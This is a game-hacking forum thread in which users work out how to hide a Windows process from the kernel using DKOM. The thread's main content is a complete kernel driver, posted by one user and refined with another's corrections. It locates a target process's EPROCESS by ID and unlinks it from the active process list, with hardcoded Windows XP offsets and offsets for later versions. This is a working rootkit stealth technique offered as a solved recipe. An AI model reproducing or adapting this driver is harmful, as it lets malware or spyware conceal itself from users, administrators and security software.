Cheat Engine Forum Index Cheat Engine
The Official Site of Cheat Engine
 
 FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 


DKOM Question ( EPROCESS Access )

 
Post new topic   Reply to topic    Cheat Engine Forum Index -> General programming
View previous topic :: View next topic  
Author Message
Stylo
Grandmaster Cheater Supreme
Reputation: 3

Joined: 16 May 2007
Posts: 1073
Location: Israel

PostPosted: Fri Apr 08, 2011 8:29 am    Post subject: DKOM Question ( EPROCESS Access ) Reply with quote

Hi,
Recently i have started reading about DKOM
I tried accessing the EPROCESS structure to obtain the LIST_ENTRY for the next and previous EPROCESS
so i could link the previous process to it's next one for hiding the process
after a lot of BSOD's i gave up and decided to ask some1 that already have done it
when i'm writing that
Code:

NTSTATUS DriverEntry( PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath ) {
   PEPROCESS   process;
   PLIST_ENTRY   list_active_procs;

   process = PsGetCurrentProcess();
   list_active_procs = (PLIST_ENTRY)( process + 0x88 /* offset */ );
}

i get a compilation error that says that unknown size for eprocess
so when i try to access it through inline asm
i get the BSOD after i access the Flink member of LIST_ENTRY

any1 have an idea?

_________________
Stylo
Back to top
View user's profile Send private message
Innovation
Grandmaster Cheater
Reputation: 12

Joined: 14 Aug 2008
Posts: 617

PostPosted: Fri Apr 08, 2011 2:43 pm    Post subject: Reply with quote

The offset to the ActiveProcessLinks member of the EPROCESS structure may change between versions of Windows. Windows XP uses 0x88, while Windows Vista and Windows 7 use 0xA0 and 0xB8, respectively. Also, you should cast the pointer to the EPROCESS structure to an integer of some kind.
Back to top
View user's profile Send private message
Stylo
Grandmaster Cheater Supreme
Reputation: 3

Joined: 16 May 2007
Posts: 1073
Location: Israel

PostPosted: Sat Apr 09, 2011 1:27 am    Post subject: Reply with quote

can you take a look at what i'm doing here?
Code:

#include <ntddk.h>

VOID OnUnload( IN PDRIVER_OBJECT pDriverObject ) {
   DbgPrint( "Driver Unloaded!" );
}

NTSTATUS DriverEntry( PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath ) {
   PEPROCESS   process;
   INT         i_process, count = 0, currentProcessId, Addr;
   PLIST_ENTRY   list_active_procs;

   pDriverObject->DriverUnload = OnUnload;
   DbgPrint( "Driver Loaded!" );

   // EPROCESS for the current process
   process = PsGetCurrentProcess();
   while( count ++ < 10 ) {
      // Casting EPROCESS to INT
      i_process = (INT)process;

      // Print EPROCESS Address
      DbgPrint( "EPROCESS Address = %x", i_process );

      // Get the process id from eprocess and print it
      currentProcessId = *(INT*)(i_process + 0x84 /* UniqueProcessId offset for win. xp sp3 */ );
      DbgPrint( "Current Process Id = %d", currentProcessId );

      // Get the LIST_ENTRY from the current EPROCESS
      Addr = *(INT*)(i_process + 0x88 /* ActiveProcessList offset for win. xp sp3 */ );
      list_active_procs = (PLIST_ENTRY)Addr;

      // Get the next EPROCESS (Flink)
      process = (PEPROCESS) list_active_procs->Flink;
   }

   return STATUS_SUCCESS;
}

i'm trying to the first 10 EPROCESS's after the current EPROCESS
but i always get BSOD
for the first EPROCESS structure's process id i always get: 4
so i guess this is the System process

_________________
Stylo
Back to top
View user's profile Send private message
Innovation
Grandmaster Cheater
Reputation: 12

Joined: 14 Aug 2008
Posts: 617

PostPosted: Sat Apr 09, 2011 8:45 am    Post subject: This post has 1 review(s) Reply with quote

The current process will always be the System process unless the driver's execution of the code was caused by an IOCTL, so you're essentially using PsActiveProcessHead. And, as the definition of LIST_ENTRY dictates, Flink points to the next Flink, not the next EPROCESS.

I was unable to test the following code, but hopefully it will work. Keep in mind that ActiveProcessList is a circular doubly-linked list, so if there are less than ten processes, it will wrap back around.

Code:
#include <ntddk.h>

VOID Unload(__in PDRIVER_OBJECT pDriverObject)
{
   DbgPrint("Driver Unloaded!");
}

NTSTATUS DriverEntry(__in PDRIVER_OBJECT pDriverObject, __in PUNICODE_STRING pRegistryPath)
{
   pDriverObject->DriverUnload = Unload;
   DbgPrint("Driver Loaded!");
   PEPROCESS pProcess = PsGetCurrentProcess();
   int nProcessIdentifier;
   PLIST_ENTRY pActiveProcessLinks;
   for(int nCount = 0; nCount < 10; ++nCount)
   {
      DbgPrint("EPROCESS Address = %x", (DWORD_PTR)pProcess);
      nProcessIdentifier = *(int *)((DWORD_PTR)pProcess + 0x84);
      DbgPrint("Process Identifier = %d", nProcessIdentifier);
      pActiveProcessLinks = (PLIST_ENTRY)((DWORD_PTR)pProcess + 0x88);
      pProcess = (PEPROCESS)((DWORD_PTR)pActiveProcessLinks->Flink - 0x88);
   }
   return STATUS_SUCCESS;
}
Back to top
View user's profile Send private message
Stylo
Grandmaster Cheater Supreme
Reputation: 3

Joined: 16 May 2007
Posts: 1073
Location: Israel

PostPosted: Sat Apr 09, 2011 9:44 am    Post subject: Reply with quote

Innovation wrote:
The current process will always be the System process unless the driver's execution of the code was caused by an IOCTL, so you're essentially using PsActiveProcessHead. And, as the definition of LIST_ENTRY dictates, Flink points to the next Flink, not the next EPROCESS.

I was unable to test the following code, but hopefully it will work. Keep in mind that ActiveProcessList is a circular doubly-linked list, so if there are less than ten processes, it will wrap back around.

Code:
#include <ntddk.h>

VOID Unload(__in PDRIVER_OBJECT pDriverObject)
{
   DbgPrint("Driver Unloaded!");
}

NTSTATUS DriverEntry(__in PDRIVER_OBJECT pDriverObject, __in PUNICODE_STRING pRegistryPath)
{
   pDriverObject->DriverUnload = Unload;
   DbgPrint("Driver Loaded!");
   PEPROCESS pProcess = PsGetCurrentProcess();
   int nProcessIdentifier;
   PLIST_ENTRY pActiveProcessLinks;
   for(int nCount = 0; nCount < 10; ++nCount)
   {
      DbgPrint("EPROCESS Address = %x", (DWORD_PTR)pProcess);
      nProcessIdentifier = *(int *)((DWORD_PTR)pProcess + 0x84);
      DbgPrint("Process Identifier = %d", nProcessIdentifier);
      pActiveProcessLinks = (PLIST_ENTRY)((DWORD_PTR)pProcess + 0x88);
      pProcess = (PEPROCESS)((DWORD_PTR)pActiveProcessLinks->Flink - 0x88);
   }
   return STATUS_SUCCESS;
}

Yeah, you were right about that
and i finally managed to hide a process properly
here's the full code for it
Code:

#include <ntddk.h>

#define   PROCESS_TO_HIDE               1234 // Process Id to hide
#define   EPROCESS_OFFSET_PID            0x84
#define   EPROCESS_OFFSET_ACTIVEPROCS      0x88

INT GetEprocessByProcessId( INT   ProcessId ) {
   PEPROCESS      eProcess;
   INT            iProcess, currentProcessId;
   LIST_ENTRY      *list_active_procs;

   eProcess = PsGetCurrentProcess();
   iProcess = (INT)eProcess;
   while( 1 ) {
      currentProcessId = *(INT*)(iProcess + EPROCESS_OFFSET_PID);
      if( currentProcessId == ProcessId )
         return iProcess;
      list_active_procs = (LIST_ENTRY *)(iProcess + EPROCESS_OFFSET_ACTIVEPROCS);
      iProcess = (INT)list_active_procs->Flink;
      iProcess -= EPROCESS_OFFSET_ACTIVEPROCS;
   }

   return 0x00000000;
}

VOID HideProcess( INT iProcess ) {
   LIST_ENTRY   *list_active_procs;

   list_active_procs = (LIST_ENTRY*)(iProcess + EPROCESS_OFFSET_ACTIVEPROCS);
   *((INT*)list_active_procs->Blink) = (INT)list_active_procs->Flink;
   *((INT*)list_active_procs->Flink + 1) = (INT)list_active_procs->Flink;
   list_active_procs->Flink = (LIST_ENTRY *) &(list_active_procs->Flink);
   list_active_procs->Blink = (LIST_ENTRY *) &(list_active_procs->Flink);
}

VOID OnUnload( IN PDRIVER_OBJECT pDriverObject ) {
   DbgPrint( "Driver Unloaded!" );
}

NTSTATUS DriverEntry( PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath ) {
   INT      iProcess;

   pDriverObject->DriverUnload = OnUnload;
   DbgPrint( "Driver Loaded!" );
   iProcess = GetEprocessByProcessId( PROCESS_TO_HIDE );
   DbgPrint( "EPROCESS for %d found", PROCESS_TO_HIDE );
   DbgPrint( "Address = %x", iProcess );
   DbgPrint( "Attempting to hide %d . .", PROCESS_TO_HIDE );
   HideProcess( iProcess );

   return STATUS_SUCCESS;
}

Thank you for your help Very Happy

_________________
Stylo
Back to top
View user's profile Send private message
brunojex
How do I cheat?
Reputation: 0

Joined: 30 Jan 2013
Posts: 5

PostPosted: Tue Jul 09, 2013 10:53 pm    Post subject: Reply with quote

*((INT*)list_active_procs->Flink + 1) = (INT)list_active_procs->Flink;

I pretty mutch get everything but this line, i cant figure out why it is Flink +1 and not just Flink.
Anyone can explain?
Back to top
View user's profile Send private message
Innovation
Grandmaster Cheater
Reputation: 12

Joined: 14 Aug 2008
Posts: 617

PostPosted: Wed Jul 10, 2013 1:58 am    Post subject: Reply with quote

brunojex wrote:
*((INT*)list_active_procs->Flink + 1) = (INT)list_active_procs->Flink;

I pretty mutch get everything but this line, i cant figure out why it is Flink +1 and not just Flink.
Anyone can explain?

It's the same thing (assuming sizeof(LIST_ENTRY *) == sizeof(int *) == sizeof(int)) as:
Code:
list_active_procs->Flink->Blink = list_active_procs->Flink;

See pointer arithmetic.

It was for this reason that I said to cast the pointer to the EPROCESS structure to an integer when dealing with byte offsets, else it will increment in multiples of sizeof(EPROCESS) which was not what was desired. The size of EPROCESS is unknown anyway, and that's why Stylo had compilation errors initially. DWORD_PTR is an integer Windows data type created specifically for this sort of scenario and what I used in my example code.
Back to top
View user's profile Send private message
brunojex
How do I cheat?
Reputation: 0

Joined: 30 Jan 2013
Posts: 5

PostPosted: Wed Jul 10, 2013 8:32 pm    Post subject: Reply with quote

ah i was reading it wrong actually Sad
Code:
*((INT*)list_active_procs->Flink + 1) = (INT)list_active_procs->Flink;

this is changing the forward process blink field
Code:
*((INT*)list_active_procs->Blink) = (INT)list_active_procs->Flink;

and this is changing the rearward process Flink field

i was thinking of it the other way aroud , thats why i got confused, my mistake....
Anyways thx for reply, it helped me figure out i was mistaken

so a pointer +1 will always be sizeof (pointer) bytes of the original pointer,
but if it aint a pointer but a DWORD+1 for example it will only be 1 byte of the original adress right?
Back to top
View user's profile Send private message
Display posts from previous:   
Post new topic   Reply to topic    Cheat Engine Forum Index -> General programming All times are GMT - 6 Hours
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum


Powered by phpBB © 2001, 2005 phpBB Group

CE Wiki   IRC (#CEF)   Twitter
Third party websites